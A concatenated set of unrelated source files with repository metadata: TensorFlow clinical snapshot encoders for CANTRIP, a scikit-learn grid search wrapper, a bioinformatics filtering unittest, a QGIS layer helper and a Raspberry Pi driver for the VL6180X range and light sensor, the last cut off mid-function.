with open('../features/tokenization_features_and_labels.txt', 'r+', encoding='utf8') as f:
for feature, i in zip(x, range(len(x))):
for j in feature:
f.write('%d\t' % j)
f.write('%d\n' % y[i])
| 3.734375 | 4 |
python/tools/simfempath.py | beckerrh/simfemsrc | 0 | 12799103 | <filename>python/tools/simfempath.py
import sys, os, shutil, subprocess
# def storeSourcePath(installdir, simfemsourcedir):
# with open(installdir+'/SOURCE_DIR_SIMFEM','w') as pathfile:
# pathfile.write(simfemsourcedir)
# def getSourcePath(installdir):
# with open(installdir+'/SOURCE_DIR_SIMFEM','r') as pathfile:
# return pathfile.read()
| 2.453125 | 2 |
src/hopts/grid_search.py | alexchueshev/icsme2020 | 0 | 12799104 | <gh_stars>0
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import Pipeline
from .base_search import BaseSearchALS
_KWARG_TRANSFORM = 'transform_y'
class GridSearchALS(BaseSearchALS):
def fit(self, *args, **kwargs):
x_df, y_df, cols = args
transform_y = kwargs.get(_KWARG_TRANSFORM, None)
cv = self._make_cv(cols)
scorer = self._make_scorer(transform_y=transform_y)
gs = GridSearchCV(Pipeline(self.pipe),
self.hyperparameters,
cv=cv,
scoring=scorer,
return_train_score=self.with_train_score,
n_jobs=self.n_jobs,
verbose=self.verbose)
gs.fit(x_df, y=y_df)
return gs
| 2.640625 | 3 |
encoding.py | h4ste/cantrip | 2 | 12799105 | """ Clinical snapshot encoders for use with CANTRIP Model.
CANTRIPModel expects a clinical snapshot encoder function which takes as input the CANTRIPModel and adds
clinical snapshot encoding ops to the graph returning the final clinical snapshot encoding as
[batch x max_seq_len x embedding_size]
"""
import tensorflow.compat.v1 as tf
import layers
import rnn_cell
def rnn_encoder(num_hidden, cell_fn=rnn_cell.RANCell):
"""
Creates an RNN encoder with the given number of hidden layers. If
:param num_hidden: number of hidden (memory) units use; num_hidden is iterable, a multi-layer
rnn cell will be creating using each number of hidden units
:param cell_fn: rnn_cell constructor to use
:return: rnn_encoder function
"""
def _rnn_encoder(model):
"""
:type model: modeling.BERTModel
"""
with tf.variable_scope('rnn_encoder'):
# Embed clinical observations
embedded_observations = layers.embedding_layer(model.observations, model.vocabulary_size,
model.embedding_size,
model.vocab_dropout,
training=model.training)
# Reshape to (batch * seq_len) x doc_len x embedding
flattened_embedded_obs = tf.reshape(embedded_observations,
[model.batch_size * model.max_seq_len,
model.max_snapshot_size,
model.embedding_size],
name='flat_emb_obs')
flattened_snapshot_sizes = tf.reshape(model.snapshot_sizes, [model.batch_size * model.max_seq_len],
name='flat_snapshot_sizes')
# Apply RNN to all documents in all batches
flattened_snapshot_encodings = layers.rnn_layer(cell_fn=cell_fn,
num_hidden=num_hidden,
inputs=flattened_embedded_obs,
lengths=flattened_snapshot_sizes,
return_interpretable_weights=False)
# Reshape back to (batch x seq_len x encoding_size)
return tf.reshape(flattened_snapshot_encodings,
[model.batch_size, model.max_seq_len, flattened_snapshot_encodings.shape[-1]],
name='rnn_snapshot_encoding')
return _rnn_encoder
def cnn_encoder(windows=None, kernels=1000, dropout=0.):
"""
Creates a CNN encoder with the given number of windows, kernels, and dropout
:param windows: number of consecutive observations to consider; defaults to [3, 4, 5]
:param kernels: number of convolutional kernels; defaults to 1,000
:param dropout: dropout probability; defaults to 0.0 (no dropout)
:return: cnn_encoder function
"""
if windows is None:
windows = [3, 4, 5]
def _cnn_encoder(model):
"""
:type model: BERTModel
"""
with tf.variable_scope('cnn_encoder'):
# Embed observations
embedded_observations = layers.embedding_layer(model.observations, model.vocabulary_size,
model.embedding_size,
model.vocab_dropout,
training=model.training)
# Reshape to (batch * seq_len) x snapshot_size x embedding
flattened_embedded_obs = tf.reshape(embedded_observations,
[model.batch_size * model.max_seq_len,
model.max_snapshot_size,
model.embedding_size])
# Apply parallel convolutional and pooling layers
outputs = []
for n in windows:
if dropout > 0:
flattened_embedded_obs = \
tf.keras.layers.Dropout(rate=model.dropout)(flattened_embedded_obs, training=model.training)
conv_layer = tf.keras.layers.Convolution1D(filters=kernels,
kernel_size=n,
activation=tf.nn.leaky_relu,
name="conv_%dgram" % n)(flattened_embedded_obs)
pool_layer = tf.keras.layers.MaxPooling1D(pool_size=1,
strides=model.max_snapshot_size - n + 1,
name="maxpool_%dgram" % n)(conv_layer)
outputs.append(pool_layer)
# Concatenate pooled outputs
output = tf.concat(outputs, axis=-1)
# Embed concat output with leaky ReLU
embeddings = tf.keras.layers.Dense(units=model.embedding_size, activation=tf.nn.relu)(output)
# Reshape back to [batch_size x max_seq_len x encoding_size]
return tf.reshape(embeddings, [model.batch_size, model.max_seq_len, model.embedding_size])
return _cnn_encoder
def get_bag_vectors(model):
"""
Represents snapshots as a bag of clinical observations. Specifically, returns a V-length
binary vector such that the v-th index is 1 iff the v-th observation occurs in the given snapshot
:param model: CANTRIP model
:type model: modeling.CANTRIPModel
:return: clinical snapshot encoding
"""
# 1. Evaluate which entries in model.observations are non-zero
mask = tf.not_equal(model.observations, 0)
where = tf.where(mask)
# 2. Get the vocabulary indices for non-zero observations
vocab_indices = tf.boolean_mask(model.observations, mask)
vocab_indices = tf.expand_dims(vocab_indices[:], axis=-1)
vocab_indices = tf.cast(vocab_indices, dtype=tf.int64)
# 3. Get batch and sequence indices for non-zero observations
tensor_indices = where[:, :-1]
# Concat batch, sequence, and vocabulary indices
indices = tf.concat([tensor_indices, vocab_indices], axis=-1)
# Our sparse tensor will be 1 for observed observations, 0, otherwise
ones = tf.ones_like(indices[:, 0], dtype=tf.float32)
# The dense shape will be the same as model.observations, but using the entire vocabulary as the final dimension
dense_shape = model.observations.get_shape().as_list()
dense_shape[2] = model.vocabulary_size
# Store as a sparse tensor because they're neat
st = tf.SparseTensor(indices=indices, values=ones, dense_shape=dense_shape)
return tf.sparse.reorder(st)
def dense_encoder(model):
"""
Represents documents as an embedded bag of clinical observations. Specifically, returns an embedded of the V-length
binary vector encoding all clinical observations included in a snapshot
:param model: CANTRIP model
:type model: modeling.CANTRIPModel
:return: clinical snapshot encoding
"""
with tf.variable_scope('dense_encoder'):
# Use the CPU cause things are about to weird (i.e., too big to fit in GPU memory)
with tf.device("/cpu:0"):
# Add bag-of-observation vector transformations to the model
bags = get_bag_vectors(model)
# Embed bag-of-observation vectors
embedded_observations = layers.create_embeddings(model.vocabulary_size, model.embedding_size,
model.vocab_dropout,
training=model.training)
# Reshape them so we use the same projection weights for every bag
flat_emb_bags = tf.sparse.reshape(bags, [model.batch_size * model.max_seq_len,
model.vocabulary_size],
name='flat_emb_obs')
# Dropout for fun
# if model.dropout > 0:
# flat_emb_bags = tf.layers.dropout(flat_emb_bags, rate=model.dropout, training=model.training)
# Sparse to dense projection
flat_doc_embeddings = tf.sparse_tensor_dense_matmul(flat_emb_bags, embedded_observations,
name='flat_doc_embeddings')
# More dropout for fun
flat_doc_embeddings = tf.keras.layers.Dropout(rate=model.dropout)(flat_doc_embeddings,
training=model.training)
# Reshape back to [batch_size x max_seq_len x encoding_size]
return tf.reshape(flat_doc_embeddings, [model.batch_size, model.max_seq_len, model.embedding_size],
name='doc_embeddings')
def bag_encoder(model):
"""
Represents snapshots as a bag of clinical observations. Specifically, returns a V-length
binary vector such that the v-th index is 1 iff the v-th observation occurs in the given snapshot
:param model: CANTRIP model
:type model: modeling.CANTRIPModel
:return: clinical snapshot encoding
"""
with tf.variable_scope('bow_encoder'):
# Use the CPU cause everything will be vocabulary-length
with tf.device("/cpu:0"):
return tf.sparse.to_dense(get_bag_vectors(model))
class SparseDenseLayer(tf.keras.layers.Dense):
def __init__(self,
units,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(SparseDenseLayer, self).__init__(units=units,
activation=activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
**kwargs)
def call(self, inputs):
if not isinstance(inputs, tf.SparseTensor):
return super(SparseDenseLayer, self).call(inputs)
outputs = tf.sparse.sparse_dense_matmul(inputs, self.kernel)
outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer had NaN product")
if self.use_bias:
outputs = tf.nn.bias_add(outputs, self.bias)
outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer had NaN bias sum")
if self.activation is not None:
outputs = self.activation(outputs)
outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer had NaN activation")
outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer output had NaNs")
return outputs
def dan_encoder(obs_hidden_units, avg_hidden_units, activation='gelu'):
"""Represents snapshots as a modified element-wise averages of embedded clinical observations.
:param obs_hidden_units: number of hidden units in dense layers between observation embeddings and average;
if iterable multiple dense layers will be added using the respective hidden units
:param avg_hidden_units: number of hidden units in dense layers between average embeddings and snapshot encoding;
if iterable multiple dense layers will be added using the respective hidden units
:param activation: type of activation function to use between layers
:return: clinical snapshot encoding
"""
activation_fn = None
if activation == 'gelu':
activation_fn = layers.gelu
elif activation == 'relu':
activation_fn = tf.nn.relu
elif activation == 'tanh':
activation_fn = tf.nn.tanh
elif activation == 'sigmoid':
activation_fn = tf.nn.sigmoid
else:
raise KeyError('Unsupported activation function: %s' % activation)
def _dan_encoder(model):
"""
:param model:
:type model: modeling.CANTRIPModel
:return:
"""
with tf.variable_scope('dan_encoder'):
embedded_observations = layers.embedding_layer(model.observations, model.vocabulary_size,
model.embedding_size, model.vocab_dropout,
training=model.training)
# Reshape to (batch * seq_len * doc_len) x embedding
flattened_embedded_observations = tf.reshape(
embedded_observations,
[model.batch_size * model.max_seq_len * model.max_snapshot_size,
model.embedding_size]
)
# Add dense observation layers
obs_layer = flattened_embedded_observations
for num_hidden in obs_hidden_units:
obs_layer = tf.keras.layers.Dense(units=num_hidden, activation=activation_fn)(obs_layer)
# Reshape final output by grouping observations in the same snapshot together
obs_layer = tf.reshape(obs_layer, [model.batch_size * model.max_seq_len,
model.max_snapshot_size,
obs_hidden_units[-1]])
# Divide by active number of observations rather than the padded snapshot size; requires reshaping to
# (batch x seq_len) x 1 so we can divide by this
flattened_snapshot_sizes = tf.reshape(model.snapshot_sizes, [model.batch_size * model.max_seq_len, 1])
mask = tf.sequence_mask(model.snapshot_sizes, maxlen=model.max_snapshot_size, dtype=tf.float32)
mask = tf.reshape(mask, [model.batch_size * model.max_seq_len, model.max_snapshot_size, 1])
# Compute dynamic-size element-wise average
avg_layer = tf.reduce_sum(obs_layer * mask, axis=1)
avg_layer = avg_layer / tf.cast(tf.maximum(flattened_snapshot_sizes, 1), dtype=tf.float32)
# More fun dense layers
for num_hidden in avg_hidden_units:
avg_layer = tf.keras.layers.Dense(num_hidden, activation_fn)(avg_layer)
# Final output of the model
output = tf.keras.layers.Dense(model.embedding_size, activation_fn)(avg_layer)
# Reshape to [batch_size x seq_len x encoding_size]
return tf.reshape(output, [model.batch_size, model.max_seq_len, model.embedding_size])
return _dan_encoder
def rmlp_encoder(activation='gelu', num_layers=10, num_hidden=2048):
activation_fn = None
if activation == 'gelu':
activation_fn = layers.gelu
elif activation == 'relu':
activation_fn = tf.nn.relu
elif activation == 'tanh':
activation_fn = tf.nn.tanh
elif activation == 'sigmoid':
activation_fn = tf.nn.sigmoid
else:
raise KeyError('Unsupported activation function: %s' % activation)
def residual_unit(inputs, i, units):
with tf.variable_scope("residual_unit%d" % i):
x = tf.keras.layers.Dense(units=units, activation=activation_fn)(inputs)
x = tf.keras.layers.BatchNormalization()(x)
x = activation_fn(x)
return x + inputs
def _rmlp_encoder(model):
# Convert batch x seq_len x doc_len tensor of obs IDs to batch x seq_len x vocab_size bag-of-observation vectors
with tf.variable_scope("RMLP"):
bags = get_bag_vectors(model)
flat_bags = tf.sparse.reshape(bags, [model.batch_size * model.max_seq_len, model.vocabulary_size])
x = SparseDenseLayer(units=num_hidden, activation=None)(flat_bags)
# Convert to Dense to debug NaNs
# flat_bags = tf.sparse.to_dense(flat_bags)
# flat_bags = tf.debugging.assert_all_finite(flat_bags, 'flat bags had nans')
# x = tf.keras.layers.Dense(units=num_hidden, activation=None)(flat_bags)
for i in range(num_layers):
x = residual_unit(x, i, num_hidden)
x = tf.keras.layers.Dense(units=model.embedding_size, activation=activation_fn)(x)
x = tf.debugging.assert_all_finite(x, 'dense had nans')
x = tf.reshape(x, [model.batch_size, model.max_seq_len, model.embedding_size])
x = tf.debugging.assert_all_finite(x, 'reshape had nans')
return x
return _rmlp_encoder
def vhn_encoder(activation='gelu', noise_weight=0.75, num_layers=10, depth=6, num_hidden=2048):
activation_fn = None
if activation == 'gelu':
activation_fn = layers.gelu
elif activation == 'relu':
activation_fn = tf.nn.relu
elif activation == 'tanh':
activation_fn = tf.nn.tanh
elif activation == 'sigmoid':
activation_fn = tf.nn.sigmoid
else:
raise KeyError('Unsupported activation function: %s' % activation)
def vhn_layer(inputs, units, residuals):
noise = tf.random.uniform(shape=inputs.shape, dtype=tf.float32) / noise_weight
out = tf.keras.layers.Dense(units=units, activation=activation_fn)(inputs + noise)
return tf.math.add_n([out, inputs] + residuals)
def _vhn_encoder(model):
# Convert batch x seq_len x doc_len tensor of obs IDs to batch x seq_len x vocab_size bag-of-observation vectors
bags = get_bag_vectors(model)
flat_bags = tf.sparse.reshape(bags, [model.batch_size * model.max_seq_len, model.vocabulary_size])
x = SparseDenseLayer(units=num_hidden, activation=None)(flat_bags)
residuals = []
for i in range(num_layers):
slice_ = min(i + 1, depth)
x = vhn_layer(x, units=num_hidden, residuals=residuals[-slice_:])
residuals.append(x)
x = tf.keras.layers.Dense(units=model.embedding_size, activation=activation_fn)(x)
x = tf.reshape(x, [model.batch_size, model.max_seq_len, model.embedding_size])
return x
return _vhn_encoder
| 2.671875 | 3 |
test_filter_commands.py | antgonza/version-testing-fastp-minimap2 | 0 | 12799106 | import gzip
import unittest
import subprocess
import os
class TestPreProcessing(unittest.TestCase):
def setUp(self):
# params for the test
self.curr_path = os.path.dirname(os.path.abspath(__file__))
self.output_path = self.curr_path + "/data"
self.file_one = self.output_path + "/all_reads_R1.fq"
self.file_two = self.output_path + "/all_reads_R2.fq"
self.database_path = self.curr_path
self.db_one_name = "human-GCA-phix-db"
self.db_two_name = "human-GRC-db"
self.db_three_name = "kraken2-human-db"
pass
def test_command(self):
"""Test command completes."""
# run command
res_cmnd = subprocess.run(["./test-command.sh",
self.file_one,
self.file_two,
self.database_path,
self.db_one_name,
self.db_two_name,
self.db_three_name,
self.output_path])
self.assertTrue(res_cmnd.returncode == 0)
def test_filter_results(self):
"""Test command results match expectation."""
# base truth
with open(self.output_path + '/host_read_ids.txt') as file:
exp_lines = [line.replace('\n','') for line in file.readlines()]
# check file size (should be much greater than 100 bytes)
out_size = os.path.getsize(self.output_path + '/test_res_R1.trimmed.fastq.gz')
self.assertTrue(out_size > 100)
# results
with gzip.open(self.output_path + '/test_res_R1.trimmed.fastq.gz','r') as fin:
res_lines = [line.decode("utf-8").replace('\n','') for line in fin if '@' in str(line)]
# check there are no host reads passing filter
rel_tol = len(set(res_lines) & set(exp_lines)) / len(set(exp_lines)) * 100
self.assertTrue(rel_tol < 0.1)
# finally remove files
os.remove(self.curr_path + "/fastp.html")
os.remove(self.curr_path + "/fastp.json")
os.remove(self.output_path + "/test_res_R1.trimmed.fastq.gz")
os.remove(self.output_path + "/test_res_R2.trimmed.fastq.gz")
if __name__ == "__main__":
unittest.main()
| 2.734375 | 3 |
tonggong/validations/__init__.py | Scar1et-x/tonggong | 0 | 12799107 | <filename>tonggong/validations/__init__.py
from . import errors, utils, validators
__all__ = ["validators", "errors", "utils"]
| 1.25 | 1 |
openeo-qgis-plugin-master/models/result.py | bgoesswe/openeo-qgis-plugin | 0 | 12799108 | <filename>openeo-qgis-plugin-master/models/result.py<gh_stars>0
from qgis.core import QgsRasterLayer
from qgis.PyQt.QtCore import QFileInfo
from qgis.core import QgsProject
class Result():
def __init__(self, path=None):
self.path = path
def display(self):
"""
Displays an image from the given path on a new created QGIS Layer.
"""
# Check if string is provided
if self.path:
fileInfo = QFileInfo(self.path)
path = fileInfo.filePath()
baseName = fileInfo.baseName()
layer = QgsRasterLayer(path, baseName)
QgsProject.instance().addMapLayer(layer)
if layer.isValid() is True:
print
"Layer was loaded successfully!"
else:
print
"Unable to read basename and file path - Your string is probably invalid"
| 2.296875 | 2 |
python/raspberrypi/DFRobot_VL6180X.py | DFRobot/DFRobot_VL6180X | 0 | 12799109 | <filename>python/raspberrypi/DFRobot_VL6180X.py
# -*- coding: utf-8 -*
""" file DFRobot_VL6180X.py
# DFRobot_VL6180X Class infrastructure, implementation of underlying methods
@copyright Copyright (c) 2010 DFRobot Co.Ltd (http://www.dfrobot.com)
@licence The MIT License (MIT)
@author [yangfeng]<<EMAIL>>
@version V1.0
@date 2021-02-09
@get from https://www.dfrobot.com
@url https://github.com/DFRobot/DFRobot_VL6180X
"""
import smbus
import time
import RPi.GPIO as GPIO
class DFRobot_VL6180X:
# IIC ADDR
VL6180X_IIC_ADDRESS = 0x29
# The sensor register address
VL6180X_IDENTIFICATION_MODEL_ID = 0x000
VL6180X_SYSTEM_MODE_GPIO0 = 0X010
VL6180X_SYSTEM_MODE_GPIO1 = 0X011
VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO = 0x014
VL6180X_SYSTEM_INTERRUPT_CLEAR = 0x015
VL6180X_SYSTEM_FRESH_OUT_OF_RESET = 0x016
VL6180X_SYSTEM_GROUPED_PARAMETER_HOLD = 0x017
VL6180X_SYSRANGE_START = 0x018
VL6180X_SYSRANGE_THRESH_HIGH = 0x019
VL6180X_SYSRANGE_THRESH_LOW = 0x01A
VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD = 0x01B
VL6180X_SYSRANGE_MAX_CONVERGENCE_TIME = 0x01C
VL6180X_SYSRANGE_EARLY_CONVERGENCE_ESTIMATE = 0x022
VL6180X_SYSRANGE_MAX_AMBIENT_LEVEL_MULT = 0x02C
VL6180X_SYSRANGE_RANGE_CHECK_ENABLES = 0x02D
VL6180X_SYSRANGE_VHV_RECALIBRATE = 0x02E
VL6180X_SYSRANGE_VHV_REPEAT_RATE = 0x031
VL6180X_SYSALS_START = 0x038
VL6180X_SYSALS_THRESH_HIGH = 0x03A
VL6180X_SYSALS_THRESH_LOW = 0x03C
VL6180X_SYSALS_INTERMEASUREMENT_PERIOD = 0x03E
VL6180X_SYSALS_ANALOGUE_GAIN = 0x03F
VL6180X_SYSALS_INTEGRATION_PERIOD = 0x040
VL6180X_RESULT_RANGE_STATUS = 0x04D
VL6180X_RESULT_ALS_STATUS = 0x04E
VL6180X_RESULT_INTERRUPT_STATUS_GPIO = 0x04F
VL6180X_RESULT_ALS_VAL = 0x050
VL6180X_RESULT_RANGE_VAL = 0x062
VL6180X_READOUT_AVERAGING_SAMPLE_PERIOD = 0x10A
VL6180X_FIRMWARE_RESULT_SCALER = 0x120
VL6180X_I2C_SLAVE_DEVICE_ADDRESS = 0x212
VL6180X_INTERLEAVED_MODE_ENABLE = 0x2A3
# The valid ID of the sensor
VL6180X_ID = 0xB4
# 8 gain modes for ambient light
VL6180X_ALS_GAIN_20 = 0
VL6180X_ALS_GAIN_10 = 1
VL6180X_ALS_GAIN_5 = 2
VL6180X_ALS_GAIN_2_5 = 3
VL6180X_ALS_GAIN_1_67 = 4
VL6180X_ALS_GAIN_1_25 = 5
VL6180X_ALS_GAIN_1 = 6
VL6180X_ALS_GAIN_40 = 7
# The result of the range measurenments
VL6180X_NO_ERR = 0x00
VL6180X_ALS_OVERFLOW_ERR = 0x01
VL6180X_ALS_UNDERFLOW_ERR = 0x02
VL6180X_NO_ERR = 0x00
VL6180X_EARLY_CONV_ERR = 0x06
VL6180X_MAX_CONV_ERR = 0x07
VL6180X_IGNORE_ERR = 0x08
VL6180X_MAX_S_N_ERR = 0x0B
VL6180X_RAW_Range_UNDERFLOW_ERR = 0x0C
VL6180X_RAW_Range_OVERFLOW_ERR = 0x0D
VL6180X_Range_UNDERFLOW_ERR = 0x0E
VL6180X_Range_OVERFLOW_ERR = 0x0F
# GPIO1 mode selection
VL6180X_DIS_INTERRUPT = 0
VL6180X_HIGH_INTERRUPT = 1
VL6180X_LOW_INTERRUPT = 2
# als/range interrupt mode selection
VL6180X_INT_DISABLE = 0
VL6180X_LEVEL_LOW = 1
VL6180X_LEVEL_HIGH = 2
VL6180X_OUT_OF_WINDOW = 3
VL6180X_NEW_SAMPLE_READY = 4
'''
@brief Module init
@param bus Set to IICBus
@param addr Set to IIC addr
'''
def __init__(self,iic_addr =VL6180X_IIC_ADDRESS,bus = 1):
self.__i2cbus = smbus.SMBus(bus)
self.__i2c_addr = iic_addr
self.__gain = 1.0
self.__atime =100
'''
@brief Initialize sensor
@param CE The pin number attached to the CE
@return return True succeed ;return False failed.
'''
def begin(self):
device_id = self.__get_device_id()
if device_id != self.VL6180X_ID:
return False
self.__init()
return True
'''
@brief Configure the default level of the INT pin and enable the GPIO1 interrupt function
@param mode Enable interrupt mode
@n VL6180X_DIS_INTERRUPT disabled interrupt
@n VL6180X_DIS_INTERRUPT GPIO1 interrupt enabled, INT high by default
@n VL6180X_LOW_INTERRUPT GPIO1 interrupt enabled, INT low by default
'''
def set_interrupt(self,mode):
if(mode == self.VL6180X_DIS_INTERRUPT):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x20])
elif(mode == self.VL6180X_HIGH_INTERRUPT):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x10])
elif(mode == self.VL6180X_LOW_INTERRUPT):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x30])
'''
@brief A single range
@return return ranging data ,uint mm
'''
def range_poll_measurement(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01])
return self.range_get_measurement()
'''
@brief Configuration ranging period
@param period_ms Measurement period, in milliseconds
'''
def range_set_inter_measurement_period(self,period_ms):
if(period_ms > 10):
if(period_ms < 2550):
period_ms = ( period_ms / 10 ) -1
else:
period_ms = 254
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD,period_ms])
'''
@brief Configure the interrupt mode for ranging
@param mode Enable interrupt mode
@n VL6180X_INT_DISABLE interrupt disable
@n VL6180X_LEVEL_LOW value < thresh_low
@n VL6180X_LEVEL_HIGH value > thresh_high
@n VL6180X_OUT_OF_WINDOW value < thresh_low OR value > thresh_high
@n VL6180X_NEW_SAMPLE_READY new sample ready
'''
def range_config_interrupt(self,mode):
if(mode > self.VL6180X_NEW_SAMPLE_READY):
return False
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO])
value = self.__i2cbus.read_byte(self.__i2c_addr)
value = value | mode
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO,value])
'''
@brief Configure the interrupt mode for the ambient light
@param mode Enable interrupt mode
@n VL6180X_INT_DISABLE interrupt disable
@n VL6180X_LEVEL_LOW value < thresh_low
@n VL6180X_LEVEL_HIGH value > thresh_high
@n VL6180X_OUT_OF_WINDOW value < thresh_low OR value > thresh_high
@n VL6180X_NEW_SAMPLE_READY new sample ready
'''
def als_config_interrupt(self,mode):
if(mode > self.VL6180X_NEW_SAMPLE_READY):
return False
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO])
value = self.__i2cbus.read_byte(self.__i2c_addr)
value = value | ( mode << 3 )
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO,value])
'''
@brief Enable continuous ranging mode
'''
def range_start_continuous_mode(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x01])
time.sleep(0.3);
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,7])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x03])
'''
@brief Retrieve ranging data
@return return ranging data ,uint mm
'''
def range_get_measurement(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_RANGE_VAL>>8, [self.VL6180X_RESULT_RANGE_VAL])
value = self.__i2cbus.read_byte(self.__i2c_addr)
return value
'''
@brief Clear ranging interrupt
'''
def clear_range_interrupt(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,1])
'''
@brief Clear the ambient light interrupt
'''
def clear_als_interrupt(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,2])
'''
@brief Single measurement of ambient light
@return return The light intensity,uint lux
'''
def als_poll_measurement(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x01])
return self.als_get_measurement()
'''
@brief Obtain measured light data
@return return The light intensity,uint lux
'''
def als_get_measurement(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_ALS_VAL>>8, [self.VL6180X_RESULT_ALS_VAL])
a = self.__i2cbus.read_byte(self.__i2c_addr)
b = self.__i2cbus.read_byte(self.__i2c_addr)
value = (a<<8) | b
result = ((0.32*100*value)/(self.__gain*self.__atime))
return result
'''
@brief Enable continuous measurement of ambient light intensity mode
'''
def als_start_continuous_mode(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01])
time.sleep(1)
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,7])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x03])
'''
@brief Configure the period for measuring light intensity
@param period_ms Measurement period, in milliseconds
'''
def als_set_inter_measurement_period(self,period_ms):
if(period_ms>10):
if(period_ms<2550):
period_ms = (period_ms/10) -1
else:
period_ms = 254
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSALS_INTERMEASUREMENT_PERIOD,period_ms])
'''
@brief turn on interleaved mode
'''
def start_interleaved_mode(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01])
time.sleep(1)
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CLEAR>>8, [self.VL6180X_SYSTEM_INTERRUPT_CLEAR,7])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSALS_START>>8, [self.VL6180X_SYSALS_START,0x03])
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_INTERLEAVED_MODE_ENABLE>>8, [self.VL6180X_INTERLEAVED_MODE_ENABLE,0x01])
'''
@brief Gets the interrupt state of the ranging
@return return status
@n 0 �?No threshold events reported
@n VL6180X_LEVEL_LOW :value < thresh_low
@n VL6180X_LEVEL_HIGH :value > thresh_high
@n VL6180X_OUT_OF_WINDOW :value < thresh_low OR value > thresh_high
@n VL6180X_NEW_SAMPLE_READY :new sample ready
'''
def range_get_interrupt_status(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO>>8, [self.VL6180X_RESULT_INTERRUPT_STATUS_GPIO])
result = self.__i2cbus.read_byte(self.__i2c_addr)
result = result & 0x07
return result
'''
@brief Gets the interrupt state of the measured light intensity
@return return status
@n 0 �?No threshold events reported
@n VL6180X_LEVEL_LOW :value < thresh_low
@n VL6180X_LEVEL_HIGH :value > thresh_high
@n VL6180X_OUT_OF_WINDOW :value < thresh_low OR value > thresh_high
@n VL6180X_NEW_SAMPLE_READY :new sample ready
'''
def als_get_interrupt_status(self):
